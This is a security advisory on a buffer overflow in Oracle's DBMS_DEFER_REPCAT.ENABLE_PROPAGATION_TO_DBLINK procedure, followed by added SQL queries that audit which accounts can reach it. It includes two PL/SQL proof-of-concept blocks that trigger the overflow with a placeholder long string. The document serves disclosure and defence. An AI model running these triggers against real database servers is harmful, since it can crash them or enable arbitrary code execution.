#32 - Buffer overflow in procedure ENABLE_PROPAGATION_TO_DBLINK of DBMS_DEFER_REPCAT package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Medium
Details:
When the ENABLE_PROPAGATION_TO_DBLINK procedure is called with a long string as its parameter, a buffer overflow occurs.
To reproduce the overflow, execute the following PL/SQL:
-- 'longstring' is a placeholder for the long string argument
DECLARE
  RET_VALUE_X123 BOOLEAN;
BEGIN
  RET_VALUE_X123 := SYS.DBMS_DEFER_REPCAT.ENABLE_PROPAGATION_TO_DBLINK('longstring');
END;
or
DECLARE
  a BOOLEAN; -- return value
BEGIN
  a := SYS.DBMS_DEFER_REPCAT.ENABLE_PROPAGATION_TO_DBLINK(
         DBLINK       => 'longstring',
         NORMAL_ONLY  => FALSE,
         INTERNAL_SET => FALSE);
END;
Analysis:
This vulnerability can be exploited by members of the EXECUTE_CATALOG_ROLE or SYSDBA role and by users granted execute permissions on the DBMS_DEFER_REPCAT package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause a denial of service (DoS) by killing the Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g is not vulnerable.
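Exposure audit for the accounts named in the Analysis and the fixed version named above. This is an added example, not part of the original advisory; it assumes a session with SELECT access to the DBA_* dictionary views and the V$ views.

```sql
-- Added example (not from the advisory): who can reach
-- SYS.DBMS_DEFER_REPCAT, and is the instance below the fixed patchset?

-- 1. Version banner, to compare against the fixed patchset (9.2.0.5).
SELECT banner
  FROM v$version;

-- 2. Direct EXECUTE grants on the package (users, roles or PUBLIC).
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner      = 'SYS'
   AND table_name = 'DBMS_DEFER_REPCAT'
   AND privilege  = 'EXECUTE';

-- 3. Everyone who inherits access through roles: start from
--    EXECUTE_CATALOG_ROLE and from any grantee found in query 2,
--    then walk nested role grants down to the end users.
SELECT DISTINCT grantee,
       granted_role AS via_role
  FROM dba_role_privs
 START WITH granted_role = 'EXECUTE_CATALOG_ROLE'
         OR granted_role IN (SELECT grantee
                               FROM dba_tab_privs
                              WHERE owner      = 'SYS'
                                AND table_name = 'DBMS_DEFER_REPCAT'
                                AND privilege  = 'EXECUTE')
CONNECT BY PRIOR grantee = granted_role
 ORDER BY grantee;

-- 4. Accounts able to connect AS SYSDBA through the password file.
SELECT username
  FROM v$pwfile_users
 WHERE sysdba = 'TRUE';
```

On an instance whose banner shows a 9.2 release below 9.2.0.5, every grantee returned by queries 2 to 4 is an account the Analysis section identifies as able to call the procedure.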